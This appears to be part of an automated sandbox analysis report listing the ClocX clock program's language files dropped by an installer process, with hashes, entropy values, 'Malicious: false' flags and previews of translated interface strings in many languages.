Preview:	001,.. .... ..... .. ........002,!.. .... ..... .. ........003,......004,......005,......006,!..... ... ..... .... ......007,!.. .... ..... .. .... .......008,!.. .... ..... .. .... .......009,!.. .... ..... .. .... ........010,AM..011,PM..012,ClocX - !..... .......013,!.. .... ..... .. ......014, (Win2k/XP) ...... ..015, ...... ..016,.......017,.........018,.......019, ..... ..020,(...... (......021,(.... 1 (..... ......022,(.... 2 (.......023, ........ .... ..024,.... .......025,(Win2k/XP) .... ...... ........026,(Win2k/XP) ... .....027,.... .......028,.... .. ...... ... ......029, ....... ...... ..030,AM/PM .....031,... .....032, ... ..033, ..... ..034,Windows .... .. .......035,(.... .. ..... (.......036,(... ..... ..... (...-......037,..........038,&.......039,&.......040,&......041,...&.....042,...&......043,&.....044,.&.....045,...... ....... ... .....046,....047,.....048,.......049,... ..... .%d..050,......051,.......052,.......053,......054,..-......055,.... ........056,:....0

C:\Program Files (x86)\ClocX\Lang\Hungarian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2439
Entropy (8bit):	5.524282620245631
Encrypted:	false
SSDEEP:	48:fzycwT+JHTioGFfNUGN+WBgJL8u/o9XwcrPFTN79ZDx5UyfdQy4wPzevGTjTu:OPiJzjGFfNRYJl/o9DBVTUyfm/aTu
MD5:	897DF08D2097EBAE47D45632EEF4344B
SHA1:	CE7718EDCA84272A94A19EF831604E88EE76CAF9
SHA-256:	FB73CFCC647F00CD7FB3AAD3F6FA6753AE62879BAF4D4576CD8116E1AA55BCEC
SHA-512:	DA22C98D987F45FC49E12053EC4B227E75508FCC1CA46ACE9855D95F877FD633522C62CEE305E0188BAD5538E923310FAF14FDAB94F357D90598178D586E990B
Malicious:	false
Reputation:	unknown
Preview:	001,K.pet nem lehet bet.lteni..002,Id.z.t.t nem lehet elind.tani!..003,.ltal.nos..004,Megjelen.t.s..005,En&ged.lyezve..006,Alpha csatorna hiba!..007,Hiba az .ramutat. bet.lt.sekor!..008,Hiba az percmutat. bet.lt.sekor!..009,Hiba az m.sodpercmutat. bet.lt.sekor!..010,DE..011,DU..012,ClocX - id.z.t. KIKAPCSOL!..013,Nem lehet a h.tteret bet.lteni!..014, .&tl.tsz.s.g (Win2k/XP) ..015, &Els.bbs.g ..016,Alacsony..017,Norm.l..018,Magas..019, .l&sim.t.s ..020,&Kikapcsolva (gyors)..021,&1 met.dus (alap.rtelmezett)..022,&2 met.dus..023, &Ablak opci.k ..024,&Mindig fel.l..025,As&ztalhoz t.zve (Win2k/XP)..026,.tklikkel.s (Win2k/&XP)..027,A&blak r.gz.t.se..028,&Poz.ci. limit.l.sa az ablakhoz..029, &El.be.ll.t.sok ..030,&DE/DU kijelz.se..031,Percenk.nt..032, &H.tt.r ..033, &Ind.t.s ..034,&Windows-al..035,Be&jelentkez.skor (felhaszn.l.)..036,Poz. ne korrig.lja (d&u.l-monitor)..037,Be.ll.t.sok..038,&OK..039,&M.gsem..040,&Bez.r..041,.&j.....042,&Szerkeszt.s.....043,&T.r.l..044,Tes&zt..045,Riaszt.sok id

C:\Program Files (x86)\ClocX\Lang\Indonesian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2296
Entropy (8bit):	5.2130956360951375
Encrypted:	false
SSDEEP:	48:S7Ikp8cURun1XREJ7aTBHkRAfdkkDdOhcjSDEnb4rt6VwTu:SMke7RsXREJ7ckk5SGb4wVwTu
MD5:	93ACABEC2DAFEC5E819D4ADFBDD86429
SHA1:	7459019E4DB35D21E2494432860FF94BA11AB498
SHA-256:	3A615F5AFDF3592336BB992B8176A702B7CE81AABA0CC13F7192E57023A973AA
SHA-512:	FBB12F645627CB6C57F513AB1189F5FF0C954B1664D8B74B6FDD451F96C8B1A58C9B166A5483670104B2947C16E5C2BE9A49F224EB237C318E4925FC5D386986
Malicious:	false
Reputation:	unknown
Preview:	001,Tidak dapat memuat gambar,..002,Tidak dapat memulai waktu!..003,Umum..004,Penampilan..005,&Enabel..006,Eror memasukkan saluran alfa!..007,Tidak dapat memuat jarum jam!..008,Tidak dapat memuat jarum menit!..009,Tidak dapat memuat jarum detik!..010,AM..011,PM..012,ClocX - alarm SHUTDOWN!..013,Tidak dpt memuat latarbelakang!..014, &Transparansi (Win2k/xP)..015, P&rioritas..016,Rendah..017,Normal..018,Tinggi..019, Antialiasing ..020,Disa&bel (cepat) ..021,Metode &1 (default)..022,Metode &2..023, jendela opsi..024,Sel&alu di atas..025,Gantung di Deskto&p (Win2k/XP)..026,Bebas &klik (Win2k/XP)..027,&Jendela tetap..028,Batas posisi dg &layar..029, Opsi preset..030,Tampilkan &AM/PM..031,Dengan teliti..032, &Latarbelakang..033, Mulai ..034,Mulai bersama &Windows..035,&Mulai dengan login (pengguna)..036,Jangan a&tur pos. (dual-monitor)..037,Opsi..038,&Oke..039,Ba&tal..040,T&utup..041,Ba&ru.....042,&Edit... ..043,Ha&pus..044,&Tes..045,Urut alarm berdasarkan waktu..046,Nama..047,Waktu..048,Tan

C:\Program Files (x86)\ClocX\Lang\Italiano.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2384
Entropy (8bit):	5.1377744629293165
Encrypted:	false
SSDEEP:	48:eYCHSWlXfWhQYLnGWDvuYhAbBLG/VDR1OUZFM9S+Net8W92xxZxpvdAj/M:F0SEXf4QMpDvu8AbSVV4eFM9S+ct8Wgd
MD5:	2D6C2E8AE88C3269B639DDACFCC87775
SHA1:	43EE3F9A70A9127BBF36B7C82D19716FE0B7A316
SHA-256:	F054EEC75474FA5AF87268D06C5DC7B007ED18C5A7FCB682C8F1E681BC5CA63A
SHA-512:	75D5595B77A65F6B03E715358A80CB80E3C3BF81A02169BFEE63515251A2DEB03427B34183FD6ED27F27F705406AD2BE1CCBC4596D4178D37202174B992F550D
Malicious:	false
Reputation:	unknown
Preview:	001,Impossibile caricare l'immagine.002,Impossibile inizializzare il timer!.003,Generale.004,Aspetto.005,Abilitato.006,Errore con la trasparenza!.007,Impossibile caricare la lancetta delle ore!.008,Impossibile caricare la lancetta dei minuti!.009,Impossibile caricare la lancetta dei secondi!.010,AM.011,PM.012,ClocX - SPEGNIMENTO (allarmi)!.013,Impossibile caricare lo sfondo!.014, Trasparenza (Win2k/XP) .015, Priorit. .016,Bassa.017,Normale.018,Alta.019, Bordi sfumati .020,Disabilitato (veloce).021,Metodo 1 (default).022,Metodo 2 (lento).023, Opzioni Finestra .024,Sempre in primo piano.025,Attacca al Desktop (Win2k/XP).026,Clicca attraverso (Win2k/XP).027,Finestra fissa.028,Posizione limitata dallo schermo.029, Opzioni Orologio .030,Mostra AM/PM.031,Ogni minuto.032, Immagine .033, Avvio .034,Inizio automatico.035,Inizio al login utente.036,Non riposizionare la finestra.037,Opzioni.038,&OK.039,&Annulla.040,&Chiudi.041,&Nuovo....042,&Modifica....043,&Elimina.044,&Test.045,Allarmi ordinati

C:\Program Files (x86)\ClocX\Lang\Japanese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	Non-ISO extended-ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2474
Entropy (8bit):	6.2844739666300145
Encrypted:	false
SSDEEP:	48:R1ZqJLkNJuzKizSeJjhrMVRazEBplicgrqrjYAayZyGX8LD/uPCnXTu:DZqKNJfixJjhrMjazEBqnqrjYAa8Ls25
MD5:	2E5F6A85256DA31D089291A7E2A9A762
SHA1:	70AE0BC41F4111DBE941F42CC3148B5B7839EE1C
SHA-256:	94DA919FCC7FDF0B84B6E056D7C5151E3BF481F83501E0956C4482E9C7DAB324
SHA-512:	C72C832A888236F068E46F69E5D00F6E62E07BC5C0E091293ED8CD27EAA3B22800EAEDEA2E4E9A5ED3383218B8A7CB0584DA6079D8F62A80E2CECE656E380CD8
Malicious:	false
Reputation:	unknown
Preview:	;ClocX 1.5 alpha 1 Language File for Japanese..;Auter : Fujita..;Url : http://www.geocities.co.jp/SiliconValley-Sunnyvale/4137/..;e-Mail : gallery_fake@msn.com....001,.........o.........002,.^.C.}.[.......................!..003,.....004,.O....005,.g.p......006,.A...t.@.`.....l.......G...[!..007,...j.....s.o.......!..008,...j.....s.o.......!..009,.b.j.....s.o.......!..010,AM..011,PM..012,ClocX - .A...[.. ....!..013,.w.i.....s.o.......!..014, .... (Win2k/XP) ..015, .D...... ..016,....017,.....018,....019, .A...`.G.C...A.X ..020,.s.\ (....)..021,...@ 1 (...)..022,...@ 2 (.x..)..023, .E.C...h.E.I.v.V.... ..024,....O..\....025,......\.. (Win2k/XP)..026,.N...b.N.......... (Win2k/XP)..027,..u.........028,.........\........029, .v...Z.b.g.... ..030,AM/PM..\........031,Minutely..032, .w.i ..033, .X.^.[.g.A.b.v..034,Windows.N......N........035,...[.U...O.I......N........036,.E.B...h.E...u.........037,.....038,OK(&O)..039,.L.....Z..(&

C:\Program Files (x86)\ClocX\Lang\Korean.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2261
Entropy (8bit):	6.240619749370674
Encrypted:	false
SSDEEP:	48:cHQXRvolvFxZrTUJN2qu/4ppruwEjOz6fF+z6hEHQXwWMooOz/RlZxY7AkCTu:EQBQhFxZrwv2NwX5kO8+jQgWMooEHZlC
MD5:	2EEFDCDA287C97061ACBDF4409AA659B
SHA1:	C1B8A1161D3EAF0836B991694931721DA3F6E8DE
SHA-256:	13D52A3C7D896B2AF05774F7C6B0E43AD4D93953F0F721C490D610FB26CA22B7
SHA-512:	1A67388402DD1228536BD53F0889FAAECE9ED4A9713E2AC1DFB84AE96F721E2EC1B9B1B3D1E2117687D5FF78175E73B88ED7CA8BBA01C537D5BD0567ED1DF27D
Malicious:	false
Reputation:	unknown
Preview:	001,..... ..... .. ..........002,..... ...... .. .......!..003,.....004,.....005,.....(&E)..006,....... ... ....!..007,..... ..... .. .......!..008,..... ..... .. .......!..009,..... ..... .. .......!..010,AM..011,PM..012,ClocX - ... ......!..013,..... ..... .. .......!..014,.....(&T) (Win2k/XP) ..015,......(&R)..016,......017,......018,......019,.........(..... .....)..020,...........(&B) (.......)..021,......... ...&1 (..)..022,......... ...&2..023,...... .....024,... ....(&A)..025,........ ....(&P) (Win2k/XP)..026,....... ....(&K) (Win2k/XP)..027,........ ....(&U)..028,... ........ ......(&L)..029,... ...... .....030,&AM/PM .......031,.....032,...(&B)..033,......034,....... ... .......(&W)..035,...... ... .......(&S)..036,... ........ ...(&J) (.......)..037,.....038,...(&O)..039,...(&C)..040,...(&C)..041,.......(&N)..042,....(&E)..043,....(&D)..044,....(&T)..045,....... ... .........046,.....047,.....0

C:\Program Files (x86)\ClocX\Lang\Nederlands.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2489
Entropy (8bit):	5.2427085130863915
Encrypted:	false
SSDEEP:	48:fm2ZJkrpaZ4DbqfTHD2E5tFUHzRKZmu1dE69x279IIjHim90gcqID+mTu:fm2ZJkESHq7FqRKZPZ9x279PjpOY5mTu
MD5:	C817194B9BCBD2D5323B0A6D7EF7C56A
SHA1:	810C07D0D0385C428D5D1B4BE7FC00DFF3DCE76D
SHA-256:	8DE577D96C63E9B9E2D7211BC900718F872C6EBE3979A83F46876FE768B1AA09
SHA-512:	587142CE6D2F7D2289560A94E75B20E831B6CDA1D4EEBFE1A20428FE028B8FCF2C7D72E82F16655B495BDA35C64A5E1E1E3A21DED8B300A4ED7AC23174961C75
Malicious:	false
Reputation:	unknown
Preview:	001,Kan afbeelding niet laden..002,Kan klok niet initialiseren!..003,Algemeen..004,Beeld..005,Inschakelen..006,Fout bij toevoegen alphakanaal!..007,Kan urenwijzer niet laden!..008,Kan minutenwijzer niet laden!..009,Kan secondenwijzer niet laden!..010,VM..011,NM..012,ClocX - Alarm UITSCHAKELEN!..013,Kan achtergrond niet laden!..014, Transparantie (Win2k/XP) ..015, Prioriteit ..016,Laag..017,Normaal..018,Hoog..019, 'Anti-aliasing' ..020,Uitgeschakeld (snel)..021,Methode 1 (normaal)..022,Methode 2 (traag)..023, Venster-eigenschappen ..024,Altijd op voorgrond..025,Plak aan bureaublad (Win2k/XP)..026,Klik door klok heen (Win2k/XP)..027,Onverplaatsbaar venster..028,Stem positie af op scherm..029, Voorgeprogrammeerde opties ..030,VM/NM weergeven..031,Elke minuut..032, Achtergrond ..033, Opstarten ..034,Opstarten met Windows..035,Opstarten bij aanmelden..036,Pos. niet wijzigen (2-schermen)..037,Opties..038,OK..039,Annuleren..040,Sluiten..041,Nieuw.....042,Bewerken.....043,Verwijderen..044,Test

C:\Program Files (x86)\ClocX\Lang\Polish.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2349
Entropy (8bit):	5.512392538157304
Encrypted:	false
SSDEEP:	48:LtjgkeiQhyCSJsZmDnami9fdB2CLLIIDj/I1zICfonRF1XOzYF9x2bL1aCFr/f:hMgCSJamrami9f3jHd2ImonhXp9x21a+
MD5:	6DAC613D6C6D0A30BEAC1B1536E051AF
SHA1:	FAF8F9EA6E95A1177B62E10CB8D9E3BC54F5F8F4
SHA-256:	C241583B8B3854991D37C399D82F71994F20EA961054FA94006815D72B713507
SHA-512:	915A39083A790864A52C8D270F307C11F43B4D4F6A712275A487318111CDDD453632EA481E6A552D147EFF786A5E679D13A9D10F26D3DD9F788C3CFD95B8F852
Malicious:	false
Reputation:	unknown
Preview:	001,Nie mog. wczyta. obrazu..002,Nie mog. uruchomi. stopera!..003,Og.lne..004,Wygl.d..005,W..czone..006,B..d przy dodawaniu kana.u alpha!..007,Nie mog. wczyta. wskaz.wki godzinowej!..008,Nie mog. wczyta. wskaz.wki minutowej!..009,Nie mog. wczyta. wskaz.wki sekundowej!..010,AM..011,PM..012,ClocX alarm: WY.ACZENIE KOMPUTERA!..013,Nie mog. wczyta. t.a!..014, Prze.roczysto.. (Win2k/XP) ..015, Priorytet ..016,Niski..017,Normalny..018,Wysoki..019, Antyaliasing ..020,Wy..czony (szybko)..021,Metoda 1 (domy.lnie)..022,Metoda 2 (wolno)..023, Opcje okna ..024,Zawsze na wierzchu..025,Przypnij do pulpitu (Win2k/XP)..026,Klikaj przez zegar (Win2k/XP)..027,Zablokuj pozycj...028,Ogranicz pozycj. do ekranu..029, Opcje zegara ..030,Pokazuj AM/PM..031,Minuty..032, T.o ..033, Uruchamianie ..034,Uruchom z Windows..035,Uruchom przy logowaniu..036,Nie dopasowuj pozycji (2 monitory)..037,Opcje..038,&OK..039,&Anuluj..040,&Zamknij..041,&Nowy.....042,&Edytuj.....043,&Usu...044,&Test..045,Alarmy posortowane wg cz

C:\Program Files (x86)\ClocX\Lang\Portuguese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2229
Entropy (8bit):	5.26744165871897
Encrypted:	false
SSDEEP:	48:9DL1hlqQSf339bGvpmxNOp7DIPHCErjK4QvX2UXaUJkwwIG:9DZnqQS3NbCmz5rFQuUhJTwIG
MD5:	DCD35241BCB58CB9A495AEBBEE280E77
SHA1:	A70E368A9E2E5FD002DCA142AC7C357BB87B4AA4
SHA-256:	424BF20CECBB097F714FA9BD12B4EA6EC4902F6229FEC88C80FF0A28F6E91BCD
SHA-512:	040F222DDC205817E629FE3EA5094320607F3E5E72A5CDF28FBB70E4C9B855AA6807697FA160B4DDA18D5338972DA65CA70F122C6073861DD6ED19C8BBCC4A67
Malicious:	false
Reputation:	unknown
Preview:	001,Imagem n.o carregada.002,Temporizador n.o iniciado!.003,Geral.004,Apar.ncia.005,Habilitado.006,Erro no canal alfa!.007,Ponteiro das horas n.o carregado!.008,Ponteiro dos minutos n.o carregado!.009,Ponteiro dos segundos n.o carregado!.010,AM.011,PM.012,ClocX - Desligar alarme!.013,Fundo n.o carregado!.014,Transpar.ncia (Win2k/XP).015,Prioridade.016,Baixa.017,Normal.018,Alta.019,Contorno suave.020,Desativado (r.pido).021,M.todo 1 (padr.o).022,M.todo 2 (lento).023,Op..es de janelas.024,Sempre em primeiro plano.025,Colar ao Desktop (Win2k/XP).026,Clique atrav.s (Win2k/XP).027,Fixo.028,Posi..o limitada pela tela.029,Op..es do rel.gio.030,Mostrar AM/PM.031,Minuciosamente.032,Fundo.033,Arranque.034,Iniciar com o Windows.035,Iniciar com login (usu.rio).036,N.o ajustar pos. (monitor-duplo).037,Op..es.038,&OK.039,&Cancelar.040,&Fechar.041,&Novo....042,&Editar....043,&Apagar.044,&Testar.045,Alarmes ordenados por tempo.046,Nome.047,Hora.048,Data.049,%d. dia no m.s.050,Diariamente.051,Semanalme

C:\Program Files (x86)\ClocX\Lang\Romanian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2326
Entropy (8bit):	5.18100710273134
Encrypted:	false
SSDEEP:	48:9CsmPKCGCvGCtQCVlJupQnCY+hALpZ4AjrNGycLek18fwwV3MuZsCHYQ2r:9OPKjuGEQ2JqQnCYOErNGtLekKIwV3TW
MD5:	928A5C47953AF408531CD2DC2AC8584E
SHA1:	E27A61AF8B8FE4B22B13CE948CBBD80E55A6AF76
SHA-256:	4764809159E4FD2D9F0ED0E7F6D44A388C97BDCD6C2631D152DC871E29245EBF
SHA-512:	921F8917AFF5CDF7819B19512AA81C779026B32A2E0A30C82AF925FE76D22B0206AB2F132999F40979C1F2DB23AD607B2B088B7D7365044BE41B42C7908B09EA
Malicious:	false
Reputation:	unknown
Preview:	001,Nu se poate .ncarca imaginea!..002,Nu se poate initializa timerul!..003,General..004,Aspect..005,Activ..006,Eroare de transparenta!..007,Nu se poate .ncarca indicatorul orar!..008,Nu se poate .ncarca minutarul!..009,Nu se poate .ncarca secundarul!..010,AM..011,PM..012,ClocX - ORA .NCHIDERII!! (programata)..013,Nu se poate .ncarca fondul!..014, Transparenta (Win2k/XP) ..015, Prioritate ..016,Joasa..017,Normala ..018,Ridicata..019,Margini catifelate..020,Inactiv (rapid)..021,Metoda 1 (implicit)..022,Metoda 2 (lent)..023,Optiuni Fereastra ..024,Permanent .n prim plan..025,Fixat pe Desktop (Win2k/XP)..026,Clic transparent (Win2k/XP)..027,Fereastra fixa..028,Pozitie limitata la ecran..029,Optiuni ceas ..030,Indicator AM/PM..031,La minut..032,Imagine ..033,Pornire ..034,Lansare automata..035,Lansare la login..036,Pozitia ferestrei fixa ..037,Optiuni..038,&OK..039,&Abandon..040,&Inchidere..041,&Nou.....042,&Modifica.....043,&Elimina..044,&Test..045,Alertari ordonate cronologic..046,Nume..

C:\Program Files (x86)\ClocX\Lang\Russian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2413
Entropy (8bit):	5.693543780784365
Encrypted:	false
SSDEEP:	48:t8IUxeikqFAecTGM+Nygw49MLuDbV3NaG2PHZG+DcZ577UagrTu:twxTkqFAPB+LwMMLUb2GaHhcZhUzTu
MD5:	BA5647E2889A3B3DA10E3BD5BE0CE4B5
SHA1:	CBE0EF3874710A2EFC9725D1A2C2F900B828D6C0
SHA-256:	2065D94FF0EF5FE40F3521861E61AB70EC546A17CB3CC2E9B15D64BD3EB96BA1
SHA-512:	DEAC73849488BB3CC82BA1AA7B930494DD1868F7011C7B6D7541D0744BF26BF94CF2D35D5BC069A54143FFE93857EBF239FC74CF12145D6F54EDC6E1F75E6164
Malicious:	false
Reputation:	unknown
Preview:	// iNorbert proudly presents..// russian translate of ClocX..// iNorbert@mail.ru....001,...... ........ ...........!..002,...... ....... .......!..003,.......004,....... .....005,..........006,...... .......... .....-......!..007,...... ........ ....... .......!..008,...... ........ ........ .......!..009,...... ........ ......... .......!..010,AM..011,PM..012,ClocX - ............!..013,...... ........ ......!..014,............ (Win2k/XP) ..015,......... ..016,........017,.........018,.........019,........... ..020,......... (......)..021,...... #1 (.. .........)..022,...... #2..023,....... ......024,...... ......025,.. ....... ..... (Win2k/XP)..026,.... .......... (Win2k/XP)..027,...............028,.......... ...... ..........029,......... ............030,.......... "AM/PM"..031,...........032,...... ..033,........ ..034,........ . ..............035,.......... ... ..... .......036,.. .............. . ..........037,...........038,....039,........040,.........041,..........042,........0

C:\Program Files (x86)\ClocX\Lang\Simple_Chinese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1886
Entropy (8bit):	6.402116213311843
Encrypted:	false
SSDEEP:	48:VlpO2ZDqLqz0Sog9VNQmdZFnU0T2fn2lYQE8cCM4vjvqB4uPCnXTu:zpO2ZDqLOP79zxnvT0nhQpJ9jva6XTu
MD5:	FA2BA4997B287CE38F2DBDDCD180D4F5
SHA1:	521B78583AE110DDA52CCACD57848B89B9589FC9
SHA-256:	6DEF2B26AD82D20590CDB14AD36A5851F6E2AF6FCA72EFC87C26FE576DDD962A
SHA-512:	C62A1192F551B6DC632315275D6E6EF5E2806DA4DFCE9AFDFBF4E06F80A6702F57CFB0222477C599814F2D577B979ED686336047848BA1816F1A6100B6667E8F
Malicious:	false
Reputation:	unknown
Preview:	001,.............002,.................003,......004,.....005,......006,... Alpha .........007,.............008,.............009,..............010,AM..011,PM..012,ClocX - ..........013,..............014,......Win2k/XP....015,..... ..016,....017,......018,....019,.......020,............021,............022,...............023,..........024,............025,.......Win2k/XP....026,..........Win2k/XP....027,.........028,....................029,...... ..030,... AM/PM..031,.......032,........033,.........034,.. Windows ......035,.............036,...............037,.....038,...(&O)..039,...(&C)..040,...(&C)..041,...(&N).....042,..(&E).....043,...(&D)..044,....(&T)..045,.....................046,......047,.....048,......049,....... %d.....050,.....051,.....052,.....053,.....054,.....055,.............056,.......057,...........058,.....059,........060,............061,........062,.... WAV ........063,........

C:\Program Files (x86)\ClocX\Lang\Slovak.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2406
Entropy (8bit):	5.585890762321675
Encrypted:	false
SSDEEP:	48:Y81cEWQ51kbiZyt8jJkuVB+X4lGxvSDjvna4HP/MTNOTJPcRW9ZBM:YYWQbDQW9eIlWEnJP6OGUa
MD5:	6B5809A31DE634A0EC58019350E4D50F
SHA1:	6060C89F71FFEF00DF7053D66087938DE5E2AEF5
SHA-256:	757B6322FF5894AF64AB3887BD8690838D5D59C561CB963CAE1AD8FF78117F1E
SHA-512:	45E98F361EEEA4ED4FEAEA0A699779F6E8A7FD1D9DC7360288C712159651419CEBD51B6A66BBA1327B316D37B294410D20DF6C33C71715CBE5F49717CA70F648
Malicious:	false
Reputation:	unknown
Preview:	001,Nemo.no na..ta. s.bor!..002,Nemo.no inicializova. Timer!..003,General..004,Appearance..005,Enabled..006,Chyba v pripojen. k alfa kan.lu!..007,Nemo.no na..ta. hodinov. PNG ru.i.ku!..008,Nemo.no na..ta. min.tov. PNG ru.i.ku!..009,Nemo.no na..ta. sekundov. PNG ru.i.ku!..010,AM..011,PM..012,ClocX - bud.k vyp.na po..ta.!..013,Nemo.no na..ta. pozadie!..014,Prieh.adnos. (Win2k/XP) ..015,Priorita..016,N.zka..017,Stredn...018,Vysok...019,Vyhladzovanie hr.n ..020,Vypnut. (r.chlej.ie)..021,Met.da 1 (v.chodzie)..022,Met.da 2 (pomal.ie)..023,Nastavenie okna ..024,V.dy na vrchu..025,V.dy na spodku (Win2k/XP)..026,Preklik.vacie (Win2k/XP)..027,Nepresunute.n...028,Zak.za. posunutie mimo obraz..029,Mo.nosti pozadia..030,Zobrazi. AM/PM..031,Minutely..032,Pozadie..033,Sp...anie..034,Spusti. pri .tarte Windows..035,Spusti. po prihl.sen. u..vate.a..036,Neupravova. poz.ciu (dual-monitor)..037,Mo.nosti..038,&OK..039,&Zru.i...040,&Zavrie...041,&Nov......042,&Zmeni......043,&Zmaza...044,&Test..045,Bud.ky (

C:\Program Files (x86)\ClocX\Lang\Slovenian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2265
Entropy (8bit):	5.32217234304011
Encrypted:	false
SSDEEP:	48:ZWUFVFU14/Jj/aMzpW1yOrKUaA2DY5uSs8CIFNM8oy5G5GPunusGN66phovaTu:zc4J7aMY1yOrKUP2OC8vFmhykAPuuBi3
MD5:	0C0351290AD760F3CEA848F6F65B4AF3
SHA1:	C2E4A8B2426463F4E80CF9D5FE74317C55A76D3E
SHA-256:	4D7AF300B3FBBC5D8CE3DCAC871C9C6CA4EDD6785721418C90042CC5C23DEC01
SHA-512:	4428499AEB70E37F6B2F6868A2B08DA1C2A121F4E2DA741048E6125C65BF224D3FBBE6CCD8421387666B7F87D3F336452902D1E3FF164500A9213340E1665DDA
Malicious:	false
Reputation:	unknown
Preview:	001,Ne morem prebrati slike..002,Ne morem pognati .asovnika!..003,Splo.ne nasavitve..004,Izgled..005,Omogo.eno..006,Napaka pri nastavljanju alfa kanala!..007,Ne morem prebrati kazalca za ure!..008,Ne morem prebrati kazalca za minute!..009,Ne morem prebrati kazalca za sekunde!..010,AM..011,PM..012,ClocX - alarm IZKLJU.EVANJE!..013,Ne morem prebrati ozadja!..014, Prosojnost (Win2k/XP) ..015, Prioriteta ..016,Nizek..017,Normalen..018,Visok..019, Bla.enje..020,Izklju.eno (fast)..021,Metoda 1 (default)..022,Metoda 2 (po.asneje)..023, Opcije okna ..024,Vedno na vrhu..025,Prijet na Desktop (Win2k/XP)..026,Klik skozi (Win2k/XP)..027,Nepremi.no okno..028,Omejiti pozicijo na velikost zaslona..029, Preset opcije ..030,Prika.i AM/PM..031,Minutno..032, Ozadje ..033, Startup ..034,Za.eni z Windowsi..035,Za.eni ob prijavi..036,Ne vra.aj okna na za.etno pozicijo..037,Opcije..038,&V redu..039,&Prekli.i..040,&Zapri..041,&Novi.....042,&Popravi.....043,&Bri.i..044,&Test..045,Alarmi urejeni po .asi..046,Na

C:\Program Files (x86)\ClocX\Lang\Srpski.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2344
Entropy (8bit):	5.344770829282602
Encrypted:	false
SSDEEP:	48:Oe2ySYKHbJVvamhXm6NPLFXYmB4midNoiqiEUygVMg+a3kGjkIa2RFmk4RTu:Oe2ySFbJham86NPLFX3OmwSPU50a37Br
MD5:	1D9538A2F34F9F14C5359A802D88EEA3
SHA1:	97D508EE407E866EE43D93789EDF66A82E067AF6
SHA-256:	80E87432D776463469912BC1A0B42039FE76FC86014F236D277678ABC3F3246C
SHA-512:	230CD741CDCF2A762C6DFFB9A18772E984DF965265879BFD8400DAB2C4CE74CA70DBA5A8E2BD0B155D2D110E49B6001110E04EECFD3799A7ECEA4A402D6D217F
Malicious:	false
Reputation:	unknown
Preview:	001,Ne mogu da u.itam sliku..002,Ne mogu da inicijalizujem tajmer!..003,Op.ta pode.avanja..004,Izgled..005,Omogu.eno..006,Gre.ka pri dodavanju alfa kanala!..007,Ne mogu da u.itam kazaljku za sate!..008,Ne mogu da u.itam kazaljku za minute!..009,Ne mogu da u.itam kazaljku za sekunde!..010,AM..011,PM..012,ClocX - alarm ISKLJU.IVANJE!..013,Ne mogu da u.itam pozadinu!..014, Providnost (Win2k/XP) ..015, Prioritet ..016,Nizak..017,Normalan..018,Visok..019, Umek.avanje..020,Isklju.eno (fast)..021,Metoda 1 (default)..022,Metoda 2 (sporije)..023, Opcije prozora ..024,Uvek na vrhu..025,Zaka.en za Desktop (Win2k/XP)..026,Klik kroz (Win2k/XP)..027,Nepokretan prozor..028,Ograni.i poziciju veli.inom ekrana..029, Preset opcije ..030,Prika.i AM/PM..031,Minutno..032, Pozadina ..033, Startup ..034,Pokreni sa Windows-om..035,Pokreni pri login-u (user)..036,Ne vra.aj prozor na po.etnu poziciju..037,Opcije..038,&U redu..039,&Otka.i..040,&Zatvori..041,&Novi.....042,&Izmeni.....043,&Obri.i..044,&Test..045,Al

C:\Program Files (x86)\ClocX\Lang\Suomi.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2436
Entropy (8bit):	5.214434411536153
Encrypted:	false
SSDEEP:	48:jAspe44gcoLB3zjkP0FdaJnSp/K2drjNamUPTu:jAsp2gcMjk8F8ABjNLWTu
MD5:	FAA5BF602E511AD03ED8FAEEEC9D40CF
SHA1:	1748B8D296B6A6D742AD378BEFAC1622D8845A37
SHA-256:	5C131D1314BDF05B942583F5D6D1EA2D5659628FEADB42F4D3005BDB9982E470
SHA-512:	DE92EC4855C702E05BDFBF89F25C7B6177497B81142575692557ED2850339D2EC4B37C3A956A2EA8A4FCC180D5E53BD1D5604FE40980C4E02F12660919DD0B58
Malicious:	false
Reputation:	unknown
